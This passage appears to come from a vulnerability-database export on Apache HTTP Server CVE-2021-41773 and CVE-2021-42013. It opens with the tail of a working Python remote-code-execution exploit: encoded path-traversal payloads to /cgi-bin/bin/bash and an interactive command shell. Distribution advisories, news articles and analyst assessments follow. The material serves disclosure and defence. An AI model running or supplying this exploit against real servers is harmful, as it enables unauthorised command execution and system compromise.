os.system('/usr/bin/clear')\r\n print(header)\r\n if 'exit' in command:\r\n end()\r\n\r\ndef mute_command(url,command):\r\n session = requests.Session()\r\n req = requests.Request('POST', url=url, data=f\"echo; {command}\")\r\n prepare = req.prepare()\r\n prepare.url = url \r\n response = session.send(prepare, timeout=5)\r\n return response.text.strip()\r\n\r\n\r\ndef exploitRCE(payload):\r\n s = requests.Session()\r\n try:\r\n host = sys.argv[1]\r\n if 'http' not in host:\r\n url = 'http://'+ host + payload\r\n else:\r\n url = host + payload \r\n session = requests.Session()\r\n command = \"echo; id\"\r\n req = requests.Request('POST', url=url, data=command)\r\n prepare = req.prepare()\r\n prepare.url = url \r\n response = session.send(prepare, timeout=5)\r\n output = response.text\r\n if \"uid\" in output:\r\n choice = \"Y\"\r\n print( Fore.GREEN + '\\n[!] Target %s is vulnerable !!!' % host)\r\n print(\"[!] Sortie:\\n\\n\" + Fore.YELLOW + output )\r\n choice = input(Fore.CYAN + \"[?] Do you want to exploit this RCE ? (Y/n) : \")\r\n if choice.lower() in ['','y','yes']:\r\n while True:\r\n commands(url,command,session) \r\n else:\r\n end() \r\n else :\r\n print(Fore.RED + '\\nTarget %s isn\\'t vulnerable' % host)\r\n except KeyboardInterrupt:\r\n end()\r\n\r\ndef main():\r\n try:\r\n apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'\r\n apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'\r\n payloads = [apache2449_payload,apache2450_payload]\r\n choice = len(payloads) + 1\r\n print(header)\r\n print(\"\\033[1;37m[0] Apache 2.4.49 RCE\\n[1] Apache 2.4.50 RCE\")\r\n while choice >= len(payloads) and choice >= 0:\r\n choice = int(input('[~] Choice : '))\r\n if choice < len(payloads):\r\n exploitRCE(payloads[choice])\r\n except KeyboardInterrupt:\r\n print(\"\\n\\033[1;91m[!] Bye bye !\")\r\n time.sleep(0.5)\r\n sys.exit(1)\r\n\r\nif __name__ == '__main__':\r\n main()", "sourceHref": "https://www.exploit-db.com/download/50512", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2021-11-26T19:07:07", "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-12T23:46:03", "type": "fedora", "title": "[SECURITY] Fedora 34 Update: httpd-2.4.51-1.fc34", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-12T23:46:03", "id": "FEDORA:BDD0730B86DF", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/RMIIEFINL6FUIOPD2A3M5XC6DH45Y3CC/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T19:07:07", "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-15T00:50:08", "type": "fedora", "title": "[SECURITY] Fedora 35 Update: httpd-2.4.51-2.fc35", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-15T00:50:08", "id": "FEDORA:00C4C3098596", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/WS5RVHOIIRECG65ZBTZY7IEJVWQSQPG3/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2023-02-08T16:13:05", "description": "New httpd packages are available for Slackware 14.0, 14.1, 14.2, and -current\nto fix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/httpd-2.4.51-i586-1_slack14.2.txz: Upgraded.\n SECURITY: CVE-2021-42013: Path Traversal and Remote Code\n Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete\n fix of CVE-2021-41773) (cve.mitre.org)\n It was found that the fix for CVE-2021-41773 in Apache HTTP\n Server 2.4.50 was insufficient. An attacker could use a path\n traversal attack to map URLs to files outside the directories\n configured by Alias-like directives.\n If files outside of these directories are not protected by the\n usual default configuration \"require all denied\", these requests\n can succeed. If CGI scripts are also enabled for these aliased\n pathes, this could allow for remote code execution.\n This issue only affects Apache 2.4.49 and Apache 2.4.50 and not\n earlier versions.\n Credits: Reported by Juan Escobar from Dreamlab Technologies,\n Fernando MuA+-oz from NULL Life CTF Team, and Shungo Kumasaka\n For more information, see:\n https://vulners.com/cve/CVE-2021-42013\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/httpd-2.4.51-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/httpd-2.4.51-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/httpd-2.4.51-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/httpd-2.4.51-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/httpd-2.4.51-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/httpd-2.4.51-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.51-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.51-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\n3dc9af339945226035885f4896e7c443 httpd-2.4.51-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n621539c82e9f23a2b63ec4ad4fe60fa1 httpd-2.4.51-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nb05881b3d8d5ce4edc267c1ab6f70be1 httpd-2.4.51-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n7be7108c6acbf118df01c06632242607 httpd-2.4.51-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\nd1d85a41387af3f18b777d000a023288 httpd-2.4.51-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n7909fd6353790b8cb3dd2d083ea7d6f3 httpd-2.4.51-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n169e11d499afa90780a1d8d9c23a5a94 n/httpd-2.4.51-i586-1.txz\n\nSlackware x86_64 -current package:\nc761e7d4fbc8198a21025b804a962874 n/httpd-2.4.51-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg httpd-2.4.51-i586-1_slack14.2.txz\n\nThen, restart Apache httpd:\n\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T03:27:06", "type": "slackware", "title": "[slackware-security] httpd", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-08T03:27:06", "id": "SSA-2021-280-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2021&m=slackware-security.483439", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:13", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEi9gb5J4PLNEOxKKFX0AtQmn2bTDIG7npW-qA9GjFCnWXfYi-8OQ9SwaukffMhVD5m6v18w7s2IpAunMHlqH_nua56nxSF75TEgWUfDcf1KLmAi1SoDdkWu8fPArAkFqIVxoe7CAN7QOWWYbeyshQ_288uhzAhqP4HxdGBKNYjXqgWRViZ4mY3tWIXj>)\n\nThe Apache Software Foundation on Thursday released additional security updates for its HTTP Server product to remediate what it says is an \"incomplete fix\" for an [actively exploited](<https://thehackernews.com/2021/10/apache-warns-of-zero-day-exploit-in.html>) path traversal and remote code execution flaw that it patched earlier this week.\n\n[CVE-2021-42013](<https://nvd.nist.gov/vuln/detail/CVE-2021-42013>), as the new vulnerability is identified as, builds upon [CVE-2021-41773](<https://nvd.nist.gov/vuln/detail/CVE-2021-41773>), a flaw that impacts Apache web servers running version 2.4.49 and involves a [path normalization](<https://en.wikipedia.org/wiki/URI_normalization>) bug that could enable an adversary to access and view arbitrary files stored on a vulnerable server.\n\nAlthough the flaw was addressed by the maintainers in version 2.4.50, a day after the patches were released it became known that the weakness could also be abused to gain remote code execution if the \"mod_cgi\" module was loaded and the configuration \"require all denied\" was absent, prompting Apache to issue another round of emergency updates.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgmP9T_SA-o28p-466VGcr78Opierbru3LfDlVgCT7nfEKQKBgOtCzZF_NPOrNPFlQ7eJPylLn2PZZ9equjRD9A7QS110HYjNvalKerBY2eb3flahaEkiLJHDTlWjOd8THOmBPNLqpyAi8vYLJ-uab-C08cNpuWCkNnPjJirzkc_4peC8oz756tcV43>)\n\n\"It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives,\" the company [noted](<https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013>) in an advisory. \"If files outside of these directories are not protected by the usual default configuration 'require all denied', these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution.\"\n\nThe Apache Software Foundation credited Juan Escobar from Dreamlab Technologies, Fernando Mu\u00f1oz from NULL Life CTF Team, and Shungo Kumasaka for reporting the vulnerability. In light of active exploitation, users are highly recommended to update to the latest version (2.4.51) to mitigate the risk associated with the flaw.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/10/07/apache-releases-http-server-version-2451-address-vulnerabilities>) it's \"seeing ongoing scanning of vulnerable systems, which is expected to accelerate, likely leading to exploitation,\" urging \"organizations to patch immediately if they haven't already.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T04:47:00", "type": "thn", "title": "New Patch Released for Actively Exploited 0-Day Apache Path Traversal to RCE Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-11T02:57:44", "id": "THN:A0816B13A402B9865C624E3CA1B06EA5", "href": "https://thehackernews.com/2021/10/new-patch-released-for-actively.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-22T14:11:06", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjJBWFmrxDwR-sAo4MkstpZDQPMwx9CZoJ7eLDVV609rJ4xJiILdXB44Dafb3PyCE5s1Ri5Jc6Llzv9ukmTvySwFasYUJzauu1SqYJD4QX8qdHtcags8wJ6WoS1OaLCpXFYDBlpYFLUOeVxWgCihNnpgduGTo73ZJBiJ51PZ5t2Rm9dyerH2fDCOxle/s728-e100/zero-bot.png>)\n\nThe **Zerobot** DDoS botnet has received substantial updates that expand on its ability to target more internet-connected devices and scale its network.\n\nMicrosoft Threat Intelligence Center (MSTIC) is tracking the ongoing threat under the moniker DEV-1061, its designation for unknown, emerging, or developing activity clusters.\n\nZerobot, [first documented](<https://thehackernews.com/2022/12/new-go-based-zerobot-botnet-exploiting.html>) by Fortinet FortiGuard Labs earlier this month, is a Go-based malware that propagates through vulnerabilities in web applications and IoT devices like firewalls, routers, and cameras.\n\n\"The most recent distribution of Zerobot includes additional capabilities, such as exploiting vulnerabilities in Apache and Apache Spark ([CVE-2021-42013](<https://nvd.nist.gov/vuln/detail/CVE-2021-42013>) and [CVE-2022-33891](<https://nvd.nist.gov/vuln/detail/cve-2022-33891>) respectively), and new DDoS attack capabilities,\" Microsoft researchers [said](<https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/>).\n\nAlso called ZeroStresser by its operators, the malware is offered as a DDoS-for-hire service to other criminal actors, with the botnet advertised for sale on various social media networks.\n\nMicrosoft said that one domain with connections to Zerobot \u2013 zerostresser[.]com \u2013 was among the [48 domains](<https://thehackernews.com/2022/12/fbi-charges-6-seizes-48-domains-linked.html>) that were seized by the U.S. Federal Bureau of Investigation (FBI) this month for offering DDoS attack features to paying customers.\n\nThe latest version of Zerobot spotted by Microsoft not only targets unpatched and improperly secured devices, but also attempts to brute-force over SSH and Telnet on ports 23 and 2323 for spreading to other hosts.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEinAqgv8jkFYvoNmL5PrFZbVSLUdYNYfv1c7p-cIUWu9-wuWQJhjEL0BdjOaVDflqp_NvL0We5px9uWeMZ-ph6UwHUS8FCK8KVav6_QtO3xVdpTTh7_oPVXIkhY_yNR_k0fucz2sJgBMMWqdw-s7dE2PBkwWpeSgVNvFvawsGGWUng2UVBppFhU12nH/s728-e100/attacks.png>)\n\nThe list of newly added known flaws exploited by Zerobot 1.1 is as follows -\n\n * [**CVE-2017-17105**](<https://nvd.nist.gov/vuln/detail/CVE-2017-17105>) (CVSS score: 9.8) - A command injection vulnerability in Zivif PR115-204-P-RS\n * [**CVE-2019-10655**](<https://nvd.nist.gov/vuln/detail/CVE-2019-10655>) (CVSS score: 9.8) - An unauthenticated remote code execution vulnerability in Grandstream GAC2500, GXP2200, GVC3202, GXV3275, and GXV3240\n * [**CVE-2020-25223**](<https://nvd.nist.gov/vuln/detail/CVE-2020-25223>) (CVSS score: 9.8) - A remote code execution vulnerability in the WebAdmin of Sophos SG UTM\n * [**CVE-2021-42013**](<https://nvd.nist.gov/vuln/detail/CVE-2021-42013>) (CVSS score: 9.8) - A remote code execution vulnerability in Apache HTTP Server\n * [**CVE-2022-31137**](<https://nvd.nist.gov/vuln/detail/CVE-2022-31137>) (CVSS score: 9.8) - A remote code execution vulnerability in Roxy-WI\n * [**CVE-2022-33891**](<https://nvd.nist.gov/vuln/detail/cve-2022-33891>) (CVSS score: 8.8) - An unauthenticated command injection vulnerability in Apache Spark\n * [**ZSL-2022-5717**](<https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5717.php>) (CVSS score: N/A) - A remote root command injection vulnerability in MiniDVBLinux\n\nUpon successful infection, the attack chain proceeds to download a binary named \"zero\" for a specific CPU architecture that enables it to self-propagate to more susceptible systems exposed online.\n\nAdditionally, Zerobot is said to proliferate by scanning and compromising devices with known vulnerabilities that are not included in the malware executable, such as [CVE-2022-30023](<https://nvd.nist.gov/vuln/detail/CVE-2022-30023>), a command injection vulnerability in Tenda GPON AC1200 routers.\n\nZerobot 1.1 further incorporates seven new DDoS attack methods by making use of protocols such as UDP, ICMP, and TCP, indicating \"continuous evolution and rapid addition of new capabilities.\"\n\n\"The shift toward malware as a service in the cyber economy has industrialized attacks and has made it easier for attackers to purchase and use malware, establish and maintain access to compromised networks, and utilize ready-made tools to perform their attacks,\" the tech giant said.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-22T09:39:00", "type": "thn", "title": "Zerobot Botnet Emerges as a Growing Threat with New Exploits and Capabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-17105", "CVE-2019-10655", "CVE-2020-25223", "CVE-2021-42013", "CVE-2022-30023", "CVE-2022-31137", "CVE-2022-33891"], "modified": "2022-12-22T13:25:43", "id": "THN:C1081365C69856DB9F99773D1D934E01", "href": "https://thehackernews.com/2022/12/zerobot-botnet-emerges-as-growing.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2023-03-08T05:20:40", "description": "A path traversal and remote code execution flaw was found in Apache HTTP Server 2.4.49 and 2.4.50. A remote attacker could use this flaw to map URLs to files outside the expected document root. Additionally, this flaw could leak the source of interpreted files like CGI scripts. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. This is an incomplete fix for CVE-2021-41773.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T17:33:09", "type": "redhatcve", "title": "CVE-2021-42013", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2023-03-08T05:13:29", "id": "RH:CVE-2021-42013", "href": "https://access.redhat.com/security/cve/cve-2021-42013", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "jvn": [{"lastseen": "2021-12-28T23:20:08", "description": "Apache HTTP Server provided by The Apache Software Foundation contains a directory traversal vulnerability (CWE-22).\n\n ## Impact\n\nA remote attacker may access the unprotected files in \"require all denied\" placed outside of the document root. \nMoreover, if CGI scripts are enabled, arbitrary code may be executed.\n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version according to the information provided by the developer.\n\n ## Products Affected\n\n * Apache HTTP Server 2.4.49 and 2.4.50\nAccording to the developer, the issue is caused by insufficient fix for CVE-2021-41773. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "jvn", "title": "JVN#51106450: Apache HTTP Server vulnerable to directory traversal", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-08T00:00:00", "id": "JVN:51106450", "href": "http://jvn.jp/en/jp/JVN51106450/index.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-03-09T02:16:05", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \u201crequire all denied\u201d, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at October 05, 2021 3:29pm UTC reported:\n\nApache doesn\u2019t typically run with root privileges in most environments so the value of this vulnerability will largely be in using it to leak application-specific secrets such as signing keys, database connection strings, source code etc. Path traversal vulnerabilities are among the easiest to exploit and involve no type of corruption, making them very reliable and safe to use multiple times.\n\nThere will likely be evidence within the Apache access logs of exploitation. Filtering on the HTTP status code could also provide insight into what files the attacker was able to successfully leak.\n\n**noraj** at March 31, 2022 6:23pm UTC reported:\n\nApache doesn\u2019t typically run with root privileges in most environments so the value of this vulnerability will largely be in using it to leak application-specific secrets such as signing keys, database connection strings, source code etc. Path traversal vulnerabilities are among the easiest to exploit and involve no type of corruption, making them very reliable and safe to use multiple times.\n\nThere will likely be evidence within the Apache access logs of exploitation. Filtering on the HTTP status code could also provide insight into what files the attacker was able to successfully leak.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-05T00:00:00", "type": "attackerkb", "title": "CVE-2021-41773", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-11-03T00:00:00", "id": "AKB:4BB9D3C7-37EF-4B65-B2A8-550AFC30664C", "href": "https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-17T02:00:34", "description": "Apache HTTPd\u662fApache\u57fa\u91d1\u4f1a\u5f00\u6e90\u7684\u4e00\u6b3e\u6d41\u884c\u7684HTTP\u670d\u52a1\u5668\u3002 \n2021\u5e7410\u67088\u65e5Apache HTTPd\u5b98\u65b9\u53d1\u5e03\u5b89\u5168\u66f4\u65b0\uff0c\u62ab\u9732\u4e86CVE-2021-42013 Apache HTTPd 2.4.49/2.4.50 \u8def\u5f84\u7a7f\u8d8a\u6f0f\u6d1e\u3002\u7531\u4e8e\u5bf9CVE-2021-41773 Apache HTTPd 2.4.49 \u8def\u5f84\u7a7f\u8d8a\u6f0f\u6d1e\u7684\u4fee\u590d\u4e0d\u5b8c\u5584\uff0c\u653b\u51fb\u8005\u53ef\u6784\u9020\u6076\u610f\u8bf7\u6c42\u7ed5\u8fc7\u5e03\u4e01\uff0c\u5229\u7528\u7a7f\u8d8a\u6f0f\u6d1e\u8bfb\u53d6\u5230Web\u76ee\u5f55\u4e4b\u5916\u7684\u5176\u4ed6\u6587\u4ef6\u3002\u540c\u65f6\u82e5Apache HTTPd\u5f00\u542f\u4e86cgi\u652f\u6301\uff0c\u653b\u51fb\u8005\u53ef\u6784\u9020\u6076\u610f\u8bf7\u6c42\u6267\u884c\u547d\u4ee4\uff0c\u63a7\u5236\u670d\u52a1\u5668\u3002\u963f\u91cc\u4e91\u5e94\u6025\u54cd\u5e94\u4e2d\u5fc3\u63d0\u9192 Apache HTTPd \u7528\u6237\u5c3d\u5feb\u91c7\u53d6\u5b89\u5168\u63aa\u65bd\u963b\u6b62\u6f0f\u6d1e\u653b\u51fb\u3002\n\n \n**Recent assessments:** \n \nAssessed 